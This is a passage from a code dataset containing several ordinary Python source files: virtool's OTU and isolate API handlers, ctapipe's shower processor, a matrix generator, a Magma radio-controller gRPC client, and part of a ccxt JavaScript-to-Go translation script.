Any errors are sent back to the client.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n ref_id = req.match_info[\"ref_id\"]\n\n reference = await db.references.find_one(ref_id, [\"groups\", \"users\"])\n\n if reference is None:\n return not_found()\n\n if not await virtool.references.db.check_right(req, reference, \"modify_otu\"):\n return insufficient_rights()\n\n name = data[\"name\"].strip()\n abbreviation = data[\"abbreviation\"].strip()\n\n # Check if either the name or abbreviation are already in use. Send a ``400`` if they are.\n message = await virtool.otus.db.check_name_and_abbreviation(db, ref_id, name, abbreviation)\n\n if message:\n return bad_request(message)\n\n document = await asyncio.shield(virtool.otus.db.create(\n req.app,\n ref_id,\n name,\n abbreviation,\n req[\"client\"].user_id\n ))\n\n headers = {\n \"Location\": \"/api/otus/\" + document[\"id\"]\n }\n\n return json_response(document, status=201, headers=headers)\n\n\n@routes.patch(\"/api/otus/{otu_id}\", schema={\n \"name\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False\n },\n \"abbreviation\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip\n },\n \"schema\": SCHEMA_VALIDATOR\n})\nasync def edit(req):\n \"\"\"\n Edit an existing OTU. Checks to make sure the supplied OTU name and abbreviation are not already in use in\n the collection.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n # Get existing complete otu record, at the same time ensuring it exists. Send a ``404`` if not.\n document = await db.otus.find_one(otu_id, [\"abbreviation\", \"name\", \"reference\", \"schema\"])\n\n if not document:\n return not_found()\n\n ref_id = document[\"reference\"][\"id\"]\n\n if not await virtool.references.db.check_right(req, ref_id, \"modify_otu\"):\n return insufficient_rights()\n\n name, abbreviation, schema = virtool.otus.utils.evaluate_changes(data, document)\n\n # Send ``200`` with the existing otu record if no change will be made.\n if name is None and abbreviation is None and schema is None:\n return json_response(await virtool.otus.db.join_and_format(db, otu_id))\n\n # Make sure new name or abbreviation are not already in use.\n message = await virtool.otus.db.check_name_and_abbreviation(db, ref_id, name, abbreviation)\n\n if message:\n return bad_request(message)\n\n document = await asyncio.shield(virtool.otus.db.edit(\n req.app,\n otu_id,\n name,\n abbreviation,\n schema,\n req[\"client\"].user_id\n ))\n\n return json_response(document)\n\n\n@routes.delete(\"/api/otus/{otu_id}\")\nasync def remove(req):\n \"\"\"\n Remove an OTU document and its associated sequence documents.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n document = await db.otus.find_one(otu_id, [\"reference\"])\n\n if document is None:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n await asyncio.shield(virtool.otus.db.remove(\n req.app,\n otu_id,\n req[\"client\"].user_id\n ))\n\n return web.Response(status=204)\n\n\n@routes.get(\"/api/otus/{otu_id}/isolates\")\nasync def list_isolates(req):\n \"\"\"\n Return a list of isolate records for a given otu.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n document = await virtool.otus.db.join_and_format(db, otu_id)\n\n if not document:\n return not_found()\n\n return 
json_response(document[\"isolates\"])\n\n\n@routes.get(\"/api/otus/{otu_id}/isolates/{isolate_id}\")\nasync def get_isolate(req):\n \"\"\"\n Get a complete specific isolate sub-document, including its sequences.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"isolates\"])\n\n if not document:\n return not_found()\n\n isolate = dict(virtool.otus.utils.find_isolate(document[\"isolates\"], isolate_id), sequences=[])\n\n cursor = db.sequences.find({\"otu_id\": otu_id, \"isolate_id\": isolate_id}, {\"otu_id\": False, \"isolate_id\": False})\n\n async for sequence in cursor:\n sequence[\"id\"] = sequence.pop(\"_id\")\n isolate[\"sequences\"].append(sequence)\n\n return json_response(isolate)\n\n\n@routes.post(\"/api/otus/{otu_id}/isolates\", schema={\n \"source_type\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"default\": \"\"\n },\n \"source_name\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"default\": \"\"\n },\n \"default\": {\n \"type\": \"boolean\",\n \"default\": False\n }\n})\nasync def add_isolate(req):\n \"\"\"\n Add a new isolate to a otu.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n document = await db.otus.find_one(otu_id, [\"reference\"])\n\n if not document:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n # All source types are stored in lower case.\n data[\"source_type\"] = data[\"source_type\"].lower()\n\n if not await virtool.references.db.check_source_type(db, document[\"reference\"][\"id\"], data[\"source_type\"]):\n return bad_request(\"Source type is not allowed\")\n\n isolate = await asyncio.shield(virtool.otus.isolates.add(\n req.app,\n otu_id,\n data,\n req[\"client\"].user_id\n ))\n\n headers = {\n \"Location\": f\"/api/otus/{otu_id}/isolates/{isolate['id']}\"\n }\n\n return json_response(\n isolate,\n status=201,\n headers=headers\n )\n\n\n@routes.patch(\"/api/otus/{otu_id}/isolates/{isolate_id}\", schema={\n \"source_type\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n },\n \"source_name\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n }\n})\nasync def edit_isolate(req):\n \"\"\"\n Edit an existing isolate.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id})\n\n if not document:\n return not_found()\n\n ref_id = document[\"reference\"][\"id\"]\n\n if not await virtool.references.db.check_right(req, ref_id, \"modify_otu\"):\n return insufficient_rights()\n\n # All source types are stored in lower case.\n if \"source_type\" in data:\n data[\"source_type\"] = data[\"source_type\"].lower()\n\n if not await virtool.references.db.check_source_type(db, ref_id, data[\"source_type\"]):\n return bad_request(\"Source type is not allowed\")\n\n isolate = await asyncio.shield(virtool.otus.isolates.edit(\n req.app,\n otu_id,\n isolate_id,\n data,\n req[\"client\"].user_id\n ))\n\n return json_response(isolate, status=200)\n\n\n@routes.put(\"/api/otus/{otu_id}/isolates/{isolate_id}/default\")\nasync def set_as_default(req):\n \"\"\"\n Set an isolate as default.\n\n \"\"\"\n db = 
req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\"])\n\n if not document:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n isolate = await asyncio.shield(virtool.otus.isolates.set_default(\n req.app,\n otu_id,\n isolate_id,\n req[\"client\"].user_id\n ))\n\n return json_response(isolate)\n\n\n@routes.delete(\"/api/otus/{otu_id}/isolates/{isolate_id}\")\nasync def remove_isolate(req):\n \"\"\"\n Remove an isolate and its sequences from a otu.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\"])\n\n if not document:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n await asyncio.shield(virtool.otus.isolates.remove(\n req.app,\n otu_id,\n isolate_id,\n req[\"client\"].user_id\n ))\n\n return no_content()\n\n\n@routes.get(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences\")\nasync def list_sequences(req):\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n if not await db.otus.count_documents({\"_id\": otu_id, \"isolates.id\": isolate_id}):\n return not_found()\n\n projection = list(virtool.otus.db.SEQUENCE_PROJECTION)\n\n projection.remove(\"otu_id\")\n projection.remove(\"isolate_id\")\n\n cursor = db.sequences.find({\"otu_id\": otu_id, \"isolate_id\": isolate_id}, projection)\n\n return json_response([virtool.utils.base_processor(d) async for d in cursor])\n\n\n@routes.get(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences/{sequence_id}\")\nasync def get_sequence(req):\n \"\"\"\n Get a single sequence document by its ``accession`.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n sequence_id = req.match_info[\"sequence_id\"]\n\n sequence = await virtool.otus.sequences.get(\n db,\n otu_id,\n isolate_id,\n sequence_id\n )\n\n if sequence is None:\n return not_found()\n\n return json_response(sequence)\n\n\n@routes.post(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences\", schema={\n \"accession\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False,\n \"required\": True\n },\n \"definition\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False,\n \"required\": True\n },\n \"host\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n },\n \"segment\": {\n \"type\": \"string\",\n },\n \"sequence\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False,\n \"required\": True\n },\n \"target\": {\n \"type\": \"string\"\n }\n})\nasync def create_sequence(req):\n \"\"\"\n Create a new sequence record for the given isolate.\n\n \"\"\"\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n\n # Get the subject otu document. Will be ``None`` if it doesn't exist. 
This will result in a ``404`` response.\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\", \"schema\"])\n\n if not document:\n return not_found()\n\n ref_id = document[\"reference\"][\"id\"]\n\n if not await virtool.references.db.check_right(req, ref_id, \"modify_otu\"):\n return insufficient_rights()\n\n message = await virtool.otus.sequences.check_segment_or_target(\n db,\n otu_id,\n isolate_id,\n None,\n ref_id,\n data\n )\n\n if message:\n return bad_request(message)\n\n sequence_document = await asyncio.shield(virtool.otus.sequences.create(\n req.app,\n ref_id,\n otu_id,\n isolate_id,\n data,\n req[\"client\"].user_id\n ))\n\n headers = {\n \"Location\": f\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences/{sequence_document['id']}\"\n }\n\n return json_response(sequence_document, status=201, headers=headers)\n\n\n@routes.patch(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences/{sequence_id}\", schema={\n \"accession\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False\n },\n \"host\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip\n },\n \"definition\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False\n },\n \"segment\": {\n \"type\": \"string\"\n },\n \"sequence\": {\n \"type\": \"string\",\n \"coerce\": virtool.validators.strip,\n \"empty\": False\n },\n \"target\": {\n \"type\": \"string\"\n }\n})\nasync def edit_sequence(req):\n db = req.app[\"db\"]\n data = req[\"data\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n sequence_id = req.match_info[\"sequence_id\"]\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\", \"segment\"])\n\n if not document or not await db.sequences.count_documents({\"_id\": sequence_id}):\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n message = await virtool.otus.sequences.check_segment_or_target(\n db,\n otu_id,\n isolate_id,\n sequence_id,\n document[\"reference\"][\"id\"],\n data\n )\n\n if message:\n return bad_request(message)\n\n sequence_document = await asyncio.shield(virtool.otus.sequences.edit(\n req.app,\n otu_id,\n isolate_id,\n sequence_id,\n data,\n req[\"client\"].user_id\n ))\n\n return json_response(sequence_document)\n\n\n@routes.delete(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences/{sequence_id}\")\nasync def remove_sequence(req):\n \"\"\"\n Remove a sequence from an isolate.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n sequence_id = req.match_info[\"sequence_id\"]\n\n if not await db.sequences.count_documents({\"_id\": sequence_id}):\n return not_found()\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\"])\n\n if document is None:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n await asyncio.shield(virtool.otus.sequences.remove(\n req.app,\n otu_id,\n isolate_id,\n sequence_id,\n req[\"client\"].user_id\n ))\n\n return no_content()\n\n\n@routes.get(\"/api/otus/{otu_id}/history\")\nasync def list_history(req):\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n if not await db.otus.count_documents({\"_id\": otu_id}):\n return 
not_found()\n\n cursor = db.history.find({\"otu.id\": otu_id}, projection=virtool.history.db.LIST_PROJECTION)\n\n return json_response([d async for d in cursor])\n","sub_path":"virtool/otus/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":17155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"570261449","text":"\"\"\"\nHigh level processing of showers.\n\nThis processor will be able to process a shower/event in 3 steps:\n- shower geometry\n- estimation of energy (optional, currently unavailable)\n- estimation of classification (optional, currently unavailable)\n\n\"\"\"\nfrom ctapipe.core import Component\nfrom ctapipe.core.traits import create_class_enum_trait\nfrom ctapipe.containers import ArrayEventContainer\nfrom ctapipe.instrument import SubarrayDescription\nfrom ctapipe.reco import Reconstructor\n\n\nclass ShowerProcessor(Component):\n \"\"\"\n Run the stereo event reconstruction on the input events.\n\n This is mainly needed, so that the type of reconstructor can be chosen\n via the configuration system.\n\n Input events must already contain dl1 parameters.\n \"\"\"\n reconstructor_type = create_class_enum_trait(\n Reconstructor, default_value=\"HillasReconstructor\",\n help=\"The stereo geometry reconstructor to be used\",\n )\n\n def __init__(\n self, subarray: SubarrayDescription, config=None, parent=None, **kwargs\n ):\n \"\"\"\n Parameters\n ----------\n subarray: SubarrayDescription\n Description of the subarray. Provides information about the\n camera which are useful in calibration. Also required for\n configuring the TelescopeParameter traitlets.\n config: traitlets.loader.Config\n Configuration specified by config file or cmdline arguments.\n Used to set traitlet values.\n This is mutually exclusive with passing a ``parent``.\n parent: ctapipe.core.Component or ctapipe.core.Tool\n Parent of this component in the configuration hierarchy,\n this is mutually exclusive with passing ``config``\n \"\"\"\n\n super().__init__(config=config, parent=parent, **kwargs)\n self.subarray = subarray\n self.reconstructor = Reconstructor.from_name(\n self.reconstructor_type,\n subarray=self.subarray,\n parent=self,\n )\n\n def __call__(self, event: ArrayEventContainer):\n \"\"\"\n Perform the full shower geometry reconstruction on the input event.\n\n Afterwards, optionally perform energy estimation and/or particle\n classification (currently these two operations are not yet supported).\n\n Parameters\n ----------\n event : ctapipe.containers.ArrayEventContainer\n Top-level container for all event information.\n \"\"\"\n k = self.reconstructor_type\n event.dl2.stereo.geometry[k] = self.reconstructor(event)\n","sub_path":"ctapipe/reco/shower_processor.py","file_name":"shower_processor.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"651477429","text":"import random\nimport os\nimport sys\nfrom math import pow\n\nif len(sys.argv) == 1:\n print(\"Please specify the size of the matrix, exiting...\")\n sys.exit(1)\n\nn = int(sys.argv[1])\n\ntry:\n os.remove(\"data/a_\" + str(n))\n os.remove(\"data/b_\" + str(n))\nexcept FileNotFoundError:\n pass\nf_a = open(\"data/a_\" + str(n), \"a\")\nf_b = open(\"data/b_\" + str(n), \"a\")\n\nfor i in range(0, n):\n for j in range(0, n):\n f_a.write(str((random.randint(-30, 30))))\n if j != n - 1:\n f_a.write(\" \")\n f_b.write(str((random.randint(-30, 30))))\n if j != n - 1:\n 
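# space-separate values within a row; skip the trailing separator after the last column\n            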
f_b.write(\" \")\n f_a.write(\"\\n\")\n f_b.write(\"\\n\")","sub_path":"matrix_generator.py","file_name":"matrix_generator.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9791594","text":"\"\"\"\nCopyright 2021 The Magma Authors.\n\nThis source code is licensed under the BSD-style license found in the\nLICENSE file in the root directory of this source tree.\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport argparse\nimport json\nimport logging\nimport sys\n\nimport grpc\nfrom dp.protos import enodebd_dp_pb2 as enodebd_msgs\nfrom dp.protos import enodebd_dp_pb2_grpc as enodebd_services\n\ndefault_cbsd_dict = {\n \"serial_number\": \"enodebd_client_serial_number\",\n \"fcc_id\": \"enodebd_client_fcc_id\",\n \"user_id\": \"enodebd_client_user_id\",\n \"min_power\": 0,\n \"max_power\": 20,\n \"antenna_gain\": 15,\n \"number_of_ports\": 2,\n}\n\nDP_RC_SERVICE_ADDR = 'localhost:50053'\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n)\n\n\ndef create_rc_service_channel(addr: str):\n \"\"\"\n Create Radio Controller service gRPC channel\n\n Parameters:\n addr: Radio Controller gRPC service URL\n\n Returns:\n gRPC channel\n \"\"\"\n channel = grpc.insecure_channel(addr)\n try:\n grpc.channel_ready_future(channel).result(timeout=10)\n except grpc.FutureTimeoutError:\n sys.exit('Error connecting to Radio Controller service')\n else:\n return channel\n\n\ndef create_grpc_dp_service(channel):\n \"\"\"\n Create Radio Controller gRPC service\n\n Parameters:\n channel: Radio Controller gRPC service channel\n\n Returns:\n DPServiceStub\n \"\"\"\n stub = enodebd_services.DPServiceStub(channel)\n return stub\n\n\ndef create_rc_grpc_cbsd_request(**kwargs):\n \"\"\"\n Construct a CBSDRequest gRPC message\n\n Parameters:\n kwargs: dict where keys are CBSDRequest fields, and values are the values\n\n Returns:\n CBSDRequest message\n \"\"\"\n msg = enodebd_msgs.CBSDRequest(**kwargs)\n return msg\n\n\ndef send_request(service, rpc, msg):\n \"\"\"\n Send a CBSDRequest gRPC message to gRPC endpoint\n\n Parameters:\n service: DBService\n rpc: the gRPC method of the service\n msg: CBSDRequest message\n\n Returns:\n CBSDStateResult\n \"\"\"\n resp = rpc(msg)\n return resp\n\n\ndef _get_cbsd_dict(json_file_path: str) -> dict:\n if not json_file_path:\n return default_cbsd_dict\n try:\n with open(json_file_path, 'r') as f:\n return json.load(f)\n except (ValueError, OSError) as err:\n logging.warning(\n f\"Failed to read or parse CBSD file {json_file_path}. 
{err}\",\n )\n raise\n\n\ndef _create_argparse(dp_service: enodebd_services.DPServiceStub):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-s', '--state', dest='rpc', action='store_const',\n default=dp_service.GetCBSDState, const=dp_service.GetCBSDState, help='CBSD Get State RPC',\n )\n parser.add_argument(\n '-r', '--register', dest='rpc', action='store_const',\n const=dp_service.CBSDRegister, help='CBSD Register RPC',\n )\n parser.add_argument(\n '-d', '--deregister', dest='rpc', action='store_const',\n const=dp_service.CBSDDeregister, help='CBSD Deregister RPC',\n )\n parser.add_argument(\n '-e', '--relinquish', dest='rpc', action='store_const',\n const=dp_service.CBSDRelinquish, help='CBSD Register RPC',\n )\n parser.add_argument(\n '-c', '--cbsd', dest='cbsd_json_file', action='store', type=str,\n default=None, help='Path to JSON file with CBSD config params',\n )\n return parser\n\n\ndef main():\n \"\"\"\n Top level function of the module\n \"\"\"\n channel = create_rc_service_channel(DP_RC_SERVICE_ADDR)\n dp_service = create_grpc_dp_service(channel)\n parser = _create_argparse(dp_service=dp_service)\n args = parser.parse_args()\n cbsd = _get_cbsd_dict(args.cbsd_json_file)\n msg = create_rc_grpc_cbsd_request(**cbsd)\n rpc_method_name = str(args.rpc._method)\n logging.info(f'Sending gRPC {rpc_method_name} request:\\n{msg}')\n resp = send_request(dp_service, args.rpc, msg)\n logging.info(f'Received gRPC response:\\n{resp}')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dp/cloud/python/magma/radio_controller/enodebd_client.py","file_name":"enodebd_client.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"75588810","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport traceback\nimport re\nimport humps\nimport subprocess\nimport shlex\n\nimport esprima\nimport json\n\n\nEX_NAME = 'Kucoin'\nCODE_INFO = {}\n\n\ndef get_ex_list():\n return [\n # 'kucoin',\n # 'huobipro',\n 'okex',\n # 'bitmax',\n # 'binance'\n ]\n\n\ndef get_func_code_map(code_str):\n return []\n\n\ndef init_code():\n return '''\npackage {ex}\n\nimport (\n\t. \"ccxt-master/go/base\"\n\t\"encoding/json\"\n\t\"errors\"\n\t\"fmt\"\n\t\"net/url\"\n\t\"strings\"\n)\n\ntype {ex.capitalize()} struct {\n\tExchange\n}\n\n '''\n\n\nJS_FOLD = 'js'\n\nEX_EXTRA_FUNC = {\n 'kucoin': ['fetchOrdersByStatus']\n}\nFUNC_LIST = [\n 'sign', 'fetchOrderBook', 'fetchOpenOrders', 'cancelOrder',\n 'createOrder', 'fetchOrder', 'parseOrder', 'fetchBalance',\n 'fetchOrdersByStatus', 'fetchOrdersByState', 'fetchMarkets',\n 'fetchCurrencies', 'handleErrors', 'fetchAccounts',\n 'parseOrderStatus', 'fetchOrdersByStates',\n 'ParseOrderSide', 'parseMarkets', 'parseMarket',\n 'fetchMarketsByType', 'getPathAuthenticationType', 'parseOrderSide',\n 'parseBalanceByType', 'parseAccountBalance', 'parseMarginBalance', 'parseFuturesBalance', 'parseSwapBalance'\n]\nJS_PATCH_FOR_GOLAGNG_TRANSLATE = {\n 'kucoin': {\n 'sign': {\n \"let amount = this.safeFloat (order, 'size');\": \"amount = xdfsa\",\n }\n }\n}\n\ndef read_describe(str_code):\n x = re.findall(r\"super.describe \\(\\), ({.*?})\\);\", str_code, re.MULTILINE|re.DOTALL)[0]\n\n xx = ''\n for line in x.split('\\n'):\n if '// ' in line:\n line = line[:line.find('//')]\n if 'this.' 
in line:\n continue\n xx += line + '\\n'\n\n x = xx\n x = re.sub(r': ([A-Z].+),', r': \"\\1\",', x)\n x = x.replace('undefined', 'None')\n x = x.replace('true', 'True')\n x = x.replace('false', 'False')\n a = eval(x)\n return a\n\n\ndef format_js_code_for_espima_analysis(func, block):\n block = block.replace('await ', '')\n block = block.replace('async ', 'function ')\n if 'function' not in block.split('\\n')[0]:\n block = 'function' + block\n return block\n\n\ndef format_describe_func(desc):\n return f'''\n func (self *{EX_NAME}) Describe() []byte {{\n\treturn []byte(`{json.dumps(desc, indent=4)}`)\n\t}}\n\t'''\n\ndef split_func_list(str_code):\n res = str_code.split('\\n\\n')\n if res:\n tmp = res[-1]\n res[-1] = tmp.replace('};', '')\n return res\n\n\ndef read_func(str_code):\n result = {}\n\n for block in split_func_list(str_code):\n for func in FUNC_LIST:\n if f'{func} ' in block.split('\\n')[0]:\n result[func] = format_js_code_for_espima_analysis(func, block)\n # print(format_js_code_for_espima_analysis(func, block))\n\n return result\n\n\ndef read_code_str(ex):\n p = os.path.join('..', 'js', f'{ex}.js')\n with open(p, encoding='UTF-8') as f:\n str_code = f.read()\n\n return {\n 'describe': read_describe(str_code),\n 'func': read_func(str_code),\n }\n\n\nFUNC_ARG_MAP = {\n 'createOrder': 'symbol string, typ string, side string, amount float64, price float64, params map[string]interface{}',\n 'fetchBalance': 'params map[string]interface{}',\n 'cancelOrder': 'id string, symbol string, params map[string]interface{}',\n 'fetchOpenOrders': 'symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchOrdersByStatus': 'status string, symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchOrdersByState': 'status string, symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchOrdersByStates': 'states string, symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchOrderBook': 'symbol string, limit int64, params map[string]interface{}',\n 'fetchOrder': 'id string, symbol string, params map[string]interface{}',\n 'sign': 'path string, api string, method string, params map[string]interface{}, headers interface{}, body interface{}',\n 'parseOrder': 'order interface{}, market interface{}',\n 'parseOrders': 'status string, symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchMarkets': 'params map[string]interface{}',\n 'fetchCurrencies': 'params map[string]interface{}',\n 'handleErrors': 'httpCode int64, reason string, url string, method string, headers interface{}, body string, response interface{}, requestHeaders interface{}, requestBody interface{}',\n 'fetchAccounts': 'params map[string]interface{}',\n 'parseOrderStatus': 'status string',\n 'ParseOrderSide': 'side string',\n 'parseMarket': 'market interface{}',\n 'parseMarkets': 'markets []interface{}',\n 'fetchMarketsByType': 'typ string, params map[string]interface{}',\n 'getPathAuthenticationType': 'path string',\n 'parseOrderSide': 'side string',\n 'parseBalanceByType': 'typ string, response interface{}',\n 'parseAccountBalance': 'response interface{}',\n 'parseMarginBalance': 'response interface{}',\n 'parseFuturesBalance': 'response interface{}',\n 'parseSwapBalance': 'response interface{}',\n}\nRETURN_MAP = {\n 'createOrder': 'result *Order, err error',\n 'fetchBalance': 'balanceResult *Account, err error',\n 'cancelOrder': 'response interface{}, err error',\n 'fetchOrdersByStatus': 'orders interface{}',\n 
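# note: the ordersBy* helpers return a bare interface{} with no err value, unlike the public fetch* entries\n    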
'fetchOrdersByState': 'orders interface{}',\n 'fetchOrdersByStates': 'orders interface{}',\n 'fetchOpenOrders': 'result []*Order, err error',\n 'fetchOrderBook': 'orderBook *OrderBook, err error',\n 'fetchOrder': 'result *Order, err error',\n 'sign': 'ret interface{}',\n 'parseOrder': 'result map[string]interface{}',\n 'fetchMarkets': '[] interface{}',\n 'fetchCurrencies': 'map[string]interface{}',\n 'handleErrors': '',\n 'fetchAccounts': '[]interface{}',\n 'parseOrderStatus': 'string',\n 'ParseOrderSide': 'string',\n 'parseMarket': 'interface{}',\n 'parseMarkets': '[] interface{}',\n 'fetchMarketsByType': '[] interface{}',\n 'getPathAuthenticationType': 'string',\n 'parseOrderSide': 'string',\n 'parseBalanceByType': 'interface{}',\n 'parseAccountBalance': 'map[string]interface{}',\n 'parseMarginBalance': 'map[string]interface{}',\n 'parseFuturesBalance': 'map[string]interface{}',\n 'parseSwapBalance': 'map[string]interface{}',\n}\nPANIC_DEAL_FUNC = [o.lower() for o in [\n 'fetchOrderBook', 'fetchOpenOrders', 'cancelOrder',\n 'createOrder', 'fetchOrder', 'fetchBalance',\n]]\nNIL_MAP = {\n 'string': '\"\"',\n 'int64': '0',\n 'error': 'nil'\n}\nERROR_RETURN_FUNCS = [o.lower() for o in []]\nSIDE = None\n\n\ndef get_return(func_name):\n return RETURN_MAP.get(func_name, None)\n\n\ndef get_arg(func_name):\n default = '(interface{})'\n return FUNC_ARG_MAP.get(func_name, default)\n\n\nDEFAULT_FUNC_ARGS = {\n 'SafeStringLower'.lower(): (3, '\"\"'),\n 'SafeString2'.lower(): (4, '\"\"'),\n 'SafeInteger2'.lower(): (4, 0),\n 'SafeFloat2'.lower(): (4, 0.),\n 'SafeValue'.lower(): (3, 'nil'),\n 'SafeString'.lower(): (3, '\"\"'),\n 'ApiFunc'.lower(): (4, 'nil'),\n 'SafeFloat'.lower(): (3, 0),\n 'SafeInteger'.lower(): (3, 0),\n}\n\n\ndef ThisExpression(syntax, info={}):\n return 'self'\n\n\ndef MemberExpression(syntax, info={}):\n info['error_check'] = False\n method_name = call_func_by_syntax(syntax.property)\n if syntax.object.type == 'ThisExpression' and syntax.property.type == 'Identifier' and method_need_check_err(method_name):\n info['error_check'] = True\n\n if syntax.object.type == 'ThisExpression':\n method_name = humps.pascalize(method_name)\n\n obj = call_func_by_syntax(syntax.object)\n if syntax.object.type == 'ThisExpression':\n return f'{obj}.{method_name}'\n else:\n m = {\n 'toString': f'fmt.Sprintf(\"%v\", {obj})',\n 'length': f'self.Length({obj})',\n }\n default = f'{obj}[{method_name}]'\n\n if syntax.property.type == 'Identifier' and syntax.property.name == 'push':\n if 'arg_str' in info:\n return f'{obj} = append({obj}, {info[\"arg_str\"]})'\n if syntax.property.type == 'Identifier' and syntax.property.name == 'split':\n if 'arg_str' in info:\n return f'strings.Split({obj}, {info[\"arg_str\"]})'\n\n # if info.get('pre') in ['right', 'init', 'test']:\n if info.get('pre') != 'left':\n default = f'self.Member({obj}, {method_name})'\n if info.get('pre') in ['left']:\n default = f'self.SetValue({obj}, {method_name})'\n\n return m.get(syntax.property.name, default)\n\n\ndef CallExpression(syntax, info={}):\n arg_str = ','.join([call_func_by_syntax(arg, info) for arg in syntax.arguments])\n\n # default arg\n if syntax.callee.property and syntax.callee.property.name.lower() in DEFAULT_FUNC_ARGS:\n arg_info = DEFAULT_FUNC_ARGS[syntax.callee.property.name.lower()]\n arg_str += f', {arg_info[1]}' * (arg_info[0] - len(syntax.arguments))\n info.update({'arg_str': arg_str})\n\n pre_part = 